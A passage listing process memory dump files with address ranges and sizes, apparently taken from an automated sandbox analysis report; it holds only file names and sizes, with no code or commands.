memory/748-301-0x00000000008B0000-0x00000000008DA000-memory.dmpFilesize
168KB
-
memory/756-65-0x0000000002A8B000-0x0000000002AAA000-memory.dmpFilesize
124KB
-
memory/756-59-0x0000000000000000-mapping.dmp
-
memory/756-61-0x000007FEED210000-0x000007FEEDC33000-memory.dmpFilesize
10.1MB
-
memory/756-62-0x000007FEEC6B0000-0x000007FEED20D000-memory.dmpFilesize
11.4MB
-
memory/756-63-0x000000001B820000-0x000000001BB1F000-memory.dmpFilesize
3.0MB
-
memory/756-64-0x0000000002A84000-0x0000000002A87000-memory.dmpFilesize
12KB
-
memory/756-66-0x0000000002A84000-0x0000000002A87000-memory.dmpFilesize
12KB
-
memory/756-67-0x0000000002A8B000-0x0000000002AAA000-memory.dmpFilesize
124KB
-
memory/776-319-0x0000000000000000-mapping.dmp
-
memory/808-237-0x00000000371A0000-0x00000000371B0000-memory.dmpFilesize
64KB
-
memory/808-236-0x0000000000820000-0x000000000084A000-memory.dmpFilesize
168KB
-
memory/808-179-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/824-68-0x0000000000000000-mapping.dmp
-
memory/824-359-0x0000000000000000-mapping.dmp
-
memory/828-81-0x0000000000000000-mapping.dmp
-
memory/836-239-0x00000000371A0000-0x00000000371B0000-memory.dmpFilesize
64KB
-
memory/836-181-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/836-238-0x00000000007E0000-0x000000000080A000-memory.dmpFilesize
168KB
-
memory/848-263-0x00000000007F0000-0x000000000081A000-memory.dmpFilesize
168KB
-
memory/868-180-0x00000000371A0000-0x00000000371B0000-memory.dmpFilesize
64KB
-
memory/868-234-0x0000000000870000-0x000000000089A000-memory.dmpFilesize
168KB
-
memory/868-299-0x0000000000870000-0x000000000089A000-memory.dmpFilesize
168KB
-
memory/868-178-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/880-288-0x00000000371A0000-0x00000000371B0000-memory.dmpFilesize
64KB
-
memory/880-287-0x0000000000140000-0x000000000016A000-memory.dmpFilesize
168KB
-
memory/888-430-0x0000000000000000-mapping.dmp
-
memory/900-57-0x000000001C330000-0x000000001C790000-memory.dmpFilesize
4.4MB
-
memory/900-54-0x00000000011C0000-0x0000000001B44000-memory.dmpFilesize
9.5MB
-
memory/900-58-0x000007FEFB9E1000-0x000007FEFB9E3000-memory.dmpFilesize
8KB
-
memory/900-97-0x0000000000D30000-0x0000000000D36000-memory.dmpFilesize
24KB
-
memory/900-423-0x0000000000000000-mapping.dmp
-
memory/952-483-0x0000000000000000-mapping.dmp
-
memory/964-247-0x00000000002E0000-0x000000000030A000-memory.dmpFilesize
168KB
-
memory/976-302-0x00000000003A0000-0x00000000003CA000-memory.dmpFilesize
168KB
-
memory/976-258-0x00000000003A0000-0x00000000003CA000-memory.dmpFilesize
168KB
-
memory/980-120-0x0000000000000000-mapping.dmp
-
memory/1028-72-0x0000000000000000-mapping.dmp
-
memory/1048-241-0x00000000007A0000-0x00000000007CA000-memory.dmpFilesize
168KB
-
memory/1056-87-0x0000000000000000-mapping.dmp
-
memory/1076-82-0x0000000000000000-mapping.dmp
-
memory/1120-80-0x0000000000000000-mapping.dmp
-
memory/1120-119-0x0000000000000000-mapping.dmp
-
memory/1124-89-0x0000000000000000-mapping.dmp
-
memory/1160-249-0x0000000001E10000-0x0000000001E3A000-memory.dmpFilesize
168KB
-
memory/1160-251-0x00000000371A0000-0x00000000371B0000-memory.dmpFilesize
64KB
-
memory/1160-300-0x0000000001E10000-0x0000000001E3A000-memory.dmpFilesize
168KB
-
memory/1200-447-0x0000000000000000-mapping.dmp
-
memory/1200-498-0x0000000000000000-mapping.dmp
-
memory/1208-74-0x0000000000000000-mapping.dmp
-
memory/1208-115-0x0000000000000000-mapping.dmp
-
memory/1216-123-0x0000000000000000-mapping.dmp
-
memory/1216-127-0x0000000001000000-0x0000000001984000-memory.dmpFilesize
9.5MB
-
memory/1216-264-0x0000000000650000-0x000000000067A000-memory.dmpFilesize
168KB
-
memory/1220-73-0x0000000000000000-mapping.dmp
-
memory/1220-415-0x0000000000000000-mapping.dmp
-
memory/1244-252-0x00000000001F0000-0x000000000021A000-memory.dmpFilesize
168KB
-
memory/1244-253-0x00000000371A0000-0x00000000371B0000-memory.dmpFilesize
64KB
-
memory/1284-257-0x0000000002C00000-0x0000000002C2A000-memory.dmpFilesize
168KB
-
memory/1320-84-0x0000000000000000-mapping.dmp
-
memory/1412-406-0x0000000000000000-mapping.dmp
-
memory/1424-400-0x0000000000000000-mapping.dmp
-
memory/1428-118-0x0000000000000000-mapping.dmp
-
memory/1428-79-0x0000000000000000-mapping.dmp
-
memory/1432-397-0x0000000000000000-mapping.dmp
-
memory/1464-370-0x0000000000000000-mapping.dmp
-
memory/1496-475-0x0000000000000000-mapping.dmp
-
memory/1496-96-0x0000000000000000-mapping.dmp
-
memory/1516-114-0x0000000000000000-mapping.dmp
-
memory/1548-86-0x0000000000000000-mapping.dmp
-
memory/1592-94-0x0000000000000000-mapping.dmp
-
memory/1596-93-0x0000000000000000-mapping.dmp
-
memory/1600-379-0x0000000000000000-mapping.dmp
-
memory/1604-128-0x0000000000000000-mapping.dmp
-
memory/1604-328-0x0000000000000000-mapping.dmp
-
memory/1620-439-0x0000000000000000-mapping.dmp
-
memory/1624-83-0x0000000000000000-mapping.dmp
-
memory/1636-99-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1636-101-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1636-105-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1636-112-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1636-106-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1636-109-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1636-108-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1636-121-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1636-104-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1636-103-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1636-110-0x0000000140001844-mapping.dmp
-
memory/1636-98-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1636-116-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1640-78-0x0000000000000000-mapping.dmp
-
memory/1668-70-0x0000000000000000-mapping.dmp
-
memory/1672-457-0x0000000000000000-mapping.dmp
-
memory/1740-117-0x0000000000000000-mapping.dmp
-
memory/1744-88-0x0000000000000000-mapping.dmp
-
memory/1752-152-0x0000000073A80000-0x000000007402B000-memory.dmpFilesize
5.7MB
-
memory/1752-129-0x0000000074DC1000-0x0000000074DC3000-memory.dmpFilesize
8KB
-
memory/1752-256-0x0000000073A80000-0x000000007402B000-memory.dmpFilesize
5.7MB
-
memory/1752-266-0x0000000077340000-0x00000000774C0000-memory.dmpFilesize
1.5MB
-
memory/1752-124-0x0000000000000000-mapping.dmp
-
memory/1764-90-0x0000000000000000-mapping.dmp
-
memory/1768-259-0x0000000000170000-0x000000000019A000-memory.dmpFilesize
168KB
-
memory/1784-324-0x0000000000000000-mapping.dmp
-
memory/1844-85-0x0000000000000000-mapping.dmp
-
memory/1916-76-0x0000000000000000-mapping.dmp
-
memory/1924-75-0x0000000000000000-mapping.dmp
-
memory/1936-385-0x0000000000000000-mapping.dmp
-
memory/1964-261-0x00000000371A0000-0x00000000371B0000-memory.dmpFilesize
64KB
-
memory/1964-260-0x00000000007F0000-0x000000000081A000-memory.dmpFilesize
168KB
-
memory/1988-91-0x0000000000000000-mapping.dmp
-
memory/2000-466-0x0000000000000000-mapping.dmp
-
memory/2000-92-0x0000000000000000-mapping.dmp
-
memory/2016-69-0x0000000000000000-mapping.dmp
-
memory/2024-333-0x0000000000000000-mapping.dmp